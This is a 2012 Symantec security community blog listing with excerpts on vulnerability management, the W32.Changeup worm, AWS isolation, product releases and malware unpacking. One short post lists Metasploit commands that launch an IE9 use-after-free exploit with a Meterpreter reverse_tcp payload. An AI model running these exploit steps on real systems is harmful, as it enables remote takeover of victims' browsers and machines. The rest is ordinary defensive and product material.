Video Screencast Help
Symantec Appoints Michael A. Brown CEO. Learn more.
Security Community Blog
Showing posts tagged with Critical System Protection
Showing posts in English
Gavin Fulton | 13 Dec 2012 | 0 comments

Over 6 years ago, when working for a Professional Services organization and responsible for developing key Security propositions for customers, I first developed an approach for "Vulnerability Lifecycle Management".

At the time the solution involved manual integration of a range of technologies from a range of different vendors:

  • network vulnerability assessment tool
  • patch management tool
  • compliance management tool
  • risk reduction tool (Host based IPS)
  • security intelligence feed

At that time this involved a identifying a range of tools from a number of different vendors, and the associated technical and procedural integration of inputs and outputs from each.  There were challenges with the different cost models to license this complex solution, let alone the technical integration of the various input and output formats.

Jumping forward from 2006 to 2012 and this type of solution is entirely...

Brandon Noble | 30 Nov 2012 | 15 comments

I. BACKGROUND:
In mid-2009, W32.Changeup, was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created.  Since November 2012 we have seen weekly spikes the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in-the-wild.

 

II. THREAT DETAILS:
When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even...

Deb Banerjee | 16 Nov 2012 | 0 comments

Amazon Web Services (AWS) clouds offer a variety networking security controls for segmenting and isolating EC2 instances running in that cloud. These controls address the following use cases

  1. Isolate EC2 instance from the public internet. E.g make those instances unaccessible from the public internet.
  2. Isolate EC2 instance belonging to an Enterprise from other EC2 instances belonging to other tenants.
  3. Within a tenant, isolate applications and departments from one another. This can be also be used to isolate application tiers from one another.
  4. Isolate applications and application tiers from one another within a tenants AWS network..

AWS Network Security Constructs

AWS offers a variety of networking constructs to implement these controls. These include VPC's, Gateways(Internet and VPN), NAT, Subnets, Routes, Security Groups and Elastic IP's.  These objects would be used to implement the above controls...

James Hanlon | 15 Oct 2012 | 0 comments

Cyberspace presents an incredible amount of opportunity for today’s organisations. Connectivity, innovation, productivity and collaboration are just some of the benefits on offer. However, cyberspace presents equally significant risks. Those risks can have huge impact and visibility; it seems that a week cannot go by without another cyber incident being splashed across internet feeds, newspapers and websites. This visibility means that cyber risks have the attention of the executive management of every organisation.

Cyber risks include targeted attacks, advanced persistent threats, data loss, denial-of-service attacks, hackitivism, negligent and malicious insiders, reputational damage, cyber espionage and nation state threats. In 2011, Symantec blocked over 5.5 billion malware attacks, an 81% increase over the previous year, witnessed a 36% increased in web based attacks and an increased focus and intensity of advanced persistent malware. Furthermore, Symantec...

Pritesh J. Chauhan | 11 Oct 2012 | 0 comments

 

Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT Infrastructure.

 

When selecting a new service they have either gone to tender or bought an off the shelf solution upon recommendation from colleagues/friends. 

 

Whilst this may seem great at first, over the years this has built up a number of systems each requiring their own management systems, portals, update systems and most importantly, they lack integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks. 

 

One example from a customer who had one product that is designed to AV scan contents of a USB pen drive upon connection to the machine. Another product to encrypt USB pen drives upon connection. This is great if the admin could...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Beverly van de Velde | 29 Mar 2012 | 0 comments

Education Enablement Services is developing a Symantec Cloud Security Essentials course that combines the CSA training in order to achieve the CCSK credential & a Symantec Certified Professional (SCP) in Cloud Security credential. 

This is an open call for your experiences with reviewing, designing, or implementing security solutions in a cloud environment.  These could come from situations unique to the cloud (ex. compliance issues for systems in a public cloud) - OR - general security solutions addressed in cloud environments (ex. how existing encryption policies were applied to a cloud architecture). 

We need your:
• Specific examples of security solutions in cloud environments
• Example cloud architectures – good or bad – implemented by customers
• Key questions, challenges, and concerns from customers migrating their infrastructure to...

rscovel | 19 Dec 2011 | 4 comments

Symantec Protection Center 2.1 (SPC) has been released!

The Symantec Protection Center Team is proud to announce the release of Symantec Protection Center 2.1 (2.1.0.2075), which was published today to the LiveUpdate Publishing Service.  SPC 2.0 Customers will be notified that an update to SPC is available for download.  This is a LiveUpdate release only.  This update provides fixes for a small number of defects, as well as several major enhancements.

These enhancements include:

  • New Security Audit functionality, and reports
  • New Intrusion Detection System (IDS) signature reports
  • An enhanced Specific Endpoint report
  • SPC Web Interface security certificate management
  • Updated browser compatibility

Full details are found in the SPC 2.1 Release notes (DOC4967...

Stuart_Hawkins | 16 Dec 2011 | 0 comments

Many organizations are using Critical System Protection to monitor system activity and alert if and when a host has been compromised. As the attacks to servers become more sophisticated, it’s becoming more important for organizations to block malicious activity automatically - whether the attack originates from internal or external parties - to prevent further incursion of their environment.

 

What has prevented a number of customers from moving to host IPS is the fear of false positives, and what impact the prevention may have on the applications or server workloads being supported.

 

With the most recent release of Critical System Protection customers are now able to selectively enable prevention policies without the fear of stopping critical business processes.

 

Targeted Prevention Policy (available in the...

Dinesh Theerthagiri | 17 Nov 2011 | 1 comment

This article presents information on manual unpacking of protected malicious Windows executables using the OllyDbg debugger. It also involve in fully rebuild the import table so the file can be restored to its original state and executed. Many anti-virus vendors categorized UPX, NsPack, ASpack and many other PE packers as malicious software.

Packers ???

A 'Packer' is a compression routine that squeezes an executable file. These programs created to reduce disk space and make downloads faster. It makes difficult to understand the original file and make it tricky to match the file signature of a compressed file. Packers initially send PE internal structures and then it identifies PE header, Export table, and import table in new structures & attaches code segment before OEP, called as STUB .i.e. the compressed executable is shifted to data section of newly created file. PE header & section header is no more useful since data is compressed means...